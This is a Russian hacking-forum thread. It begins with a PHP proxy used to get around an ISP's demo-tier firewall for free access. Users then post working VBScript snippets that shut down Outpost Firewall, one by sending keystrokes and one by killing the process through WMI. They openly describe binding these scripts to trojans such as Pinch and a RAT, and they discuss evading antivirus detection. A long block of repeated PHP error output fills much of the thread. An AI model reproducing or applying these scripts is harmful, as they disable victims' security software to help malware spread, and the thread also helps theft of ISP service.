скрипт обхода файервола

[comAT0Zz]

! это не статья, так, исходниками делюсь, с народом=)
и не факт, что это заработает у каждого, но Winux не даст мне соврать, эта штука работает.

теперь вкратце по сабжу. у нас в городе провайдер предоставляет демо-доступ, доступно несколько ресурсов которые он держит у себя. одним из тех ресурсов оказался наш форум. ну, человек всегда к халяве стремился, если есть демо значит где то должен быть и полный. исходники в архиве представляют собой очередной метод обхода брендмауэра провайдера. они, конечно, сырые, но работают без проблем.

думаю, для знающих PHP разобратся в коде труда не составит. хотя, для тех кто с пхп не дружит всеж объясню как юзать:
с помощью script.php можно шататься по сайтам, только не по всем, увы и ах. я лично по ftp только блуждаю - с сайтами заморочка большая. линк на ресурс выглядит примерно следующим образом:
http://my_host/script.php?server=127.0.0.1/ где айпи это целевой ресурс, файервол нашего провайдера пропускает только ip, алфавитно-буквенные адреса он блокирует напрочь, хотя это наверное не надолго=) хотя не суть. попадая на сайт приходится каждый раз линк в адресной строке править, чтобы хоть как то перемещатся по сайту. например, попадаем на главную сайта:
http://my_host/script.php?server=127.0.0.1/index.php
тыкаем в менюху(например, forum.php) и нас перебрасывает на:
http://my_host/script.php?server=forum.php
соответственно мы никуда не попадаем. единственное когда так не перебрасывало это когда на фтп далеко в каталоги углублюсь. а так вообще не удобно - приходтся каждый раз самому линк формировать. у кого нибудь может идеи есть как скрипт подправить?

далее...как скачать файл с целевого хоста:
для этого есть скрипт file.php, разобратся в нем труда не составит, только нужно указать где лежит файл. указывать соответственно с IP адреса до конца. например, файл видим тут:
ftp://my_host/script.php?server=127.0.0.1/pub/project.tar.gz
берем путь 127.0.0.1/pub/project.tar.gz и загоняем в скрипт file.php, скрипт закачивает файл на сервер в папку files, из которой в итоге можно без проблемно файл подснять по демо тарифу=)

файл hist.txt содержит историю вашего посещения.

 

[gemaglabin]

Да это фигня...тунелинг,да?

 

[Winux]

Работает, работает.
Все типо шикарно.

 

[Dude03]

Обычный баунсер(туннелинг).

где айпи это целевой ресурс, файервол нашего провайдера пропускает только ip, алфавитно-буквенные адреса он блокирует напрочь, хотя это наверное не надолго=)

Если честно этой фразы не дорубил.
А нах тебе эта строчка $host=gethostbyname($url_mas[0]); тогда????
Короче, ты сделал самый простой цги-прокси. Если что хочешь улучшить, то надо парсить полученную страницу и менять все линк на нужные тебе.

 

[comAT0Zz]

2 Dude03
в первом посте вроде ясно написано что сервер нормально может работать только с IP. все дальнейшее это уже модификации и попытки организовать обращение к ресурсам через доменные имена.

>Короче, ты сделал самый простой цги-прокси
не я сделал.

2 gemaglabin
понимаю, для кого то может и фигня, но когда есть возможность попырому закачать большой файл на сервер и в дальнейшем спокойно через демо тарифы его скачивать не тратя при этом ни копейки на инет, то это уже хоть что то.

 

[gemaglabin]

Все гениальное просто - я думаю что твой скрипт понадобится многим

 

[AHTOLLlKA]

прикольно.. не удобно токо .. но всеж =)
щяс попробую

 

[m4rrow]

Вот что мне при запуске скрипта выдаёт: :fuck:
Warning: Undefined variable: server in c:\apache\htdocs\socket.php on line 3
Warning: Empty delimiter in c:\apache\htdocs\socket.php on line 5
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant w - assumed 'w' in c:\apache\htdocs\socket.php on line 31
Warning: Use of undefined constant k - assumed 'k' in c:\apache\htdocs\socket.php on line 31

Warning: Undefined offset: 1 in c:\apache\htdocs\socket.php on line 35

Warning: Uninitialized string offset: 0 in c:\apache\htdocs\socket.php on line 38
socket.php?server=socket.php?server=socket.php?server=socket.php?server=socket.php?server=socket.php?server=
Warning: Undefined offset: 1 in c:\apache\htdocs\socket.php on line 128

Warning: Undefined variable: textf in c:\apache\htdocs\socket.php on line 140

 

[Winux]

m4rrow
А зочем вы поставели сабж на локалхостенг?

 

[Spawn™]

тема то про Фаер... так вот то что ниже рубает фаер ( аутпост )

set WShell = CreateObject("WScript.Shell")

WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
WScript.Sleep 200
WShell.AppActivate "Agnitum", TRUE
WScript.Sleep 100
  WShell . SendKeys  "{ F10 }{ DOWN }{ UP }{ ENTER }"
WScript.Sleep 100
 WShell . SendKeys  "{ ENTER }"

сохранте в текстовом с расширением VBS, склейте с троем и будет вам счастье

проверял .. пашет...

склеивал сначала скрипт, пинч, прорат... всё изумительно пашет

 

[gemaglabin]

Ага вот эта херотень вас выдает при анализе...

 

[Fallen]

Выдает как нистранно пинч)) по крайней мере каспер....
Качаем сабж отсюда - тот же скрипт - тока не палящийся.И в .exe - кто думает что я выложил трой - пусть просто проверит на себе в оффлайне...Это не трой а выгрузка аутпоста.Приделываем к трою и будет вам счастье =).
А вообще у меня есть феня покруче спец. для этого.Например :

Option Explicit
Dim objWMIService, objProcess, colProcess
Dim strComputer, strProcessKill
strComputer = "."
strProcessKill = "'firewall.exe'"

Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")

Set colProcess = objWMIService.ExecQuery ("Select * from Win32_Process Where Name = " & strProcessKill )

For Each objProcess in colProcess
objProcess.Terminate()
Next
WScript.Quit
' End of WMI Example of a Kill Process

Вместо "firewall.exe" пишем любой процесс который хотим убить.

 

[Spawn™]

так тот сабж ( ехе ) уже можно клеить с троем и всё будет чики пуки?


кстати да то что я вылажил палится как ПИНЧ ну и что с этого... в склейке ничего палится не будет

 

[gemaglabin]

F4llen бубубу аутпост в ринг0 работает он не даст себя завершить таким макаром

А потом запускаешь ольку и вся ваша подлянка как на лицо

 

[m4rrow]

2 Винюкс
А куда ебошить? :bad:

 

[Winux]

m4rrow
На сервак прова. В данном случае на его хостинг.

 

[Horrible]

да это примитивно до этого монжо додуматься легко, вот только где бы такого провайдера найти. мой провайдер на своем хсотинге (в том числе на платном) блокирует любые обращения к внешним ресурсам. Т.е. даже rss-агрегатор на нем неработет блин.

 

[Robin Gud]

так тот сабж ( ехе ) уже можно клеить с троем и всё будет чики пуки?

Чики пуки уже не будет...Во первых размер увеличивается сильно, а во вторых в OllyDbg будет всё видно

 

[gemaglabin]

Robin Gud vbs скрипт увеличит размер екзешника МАКСИМУМ на кб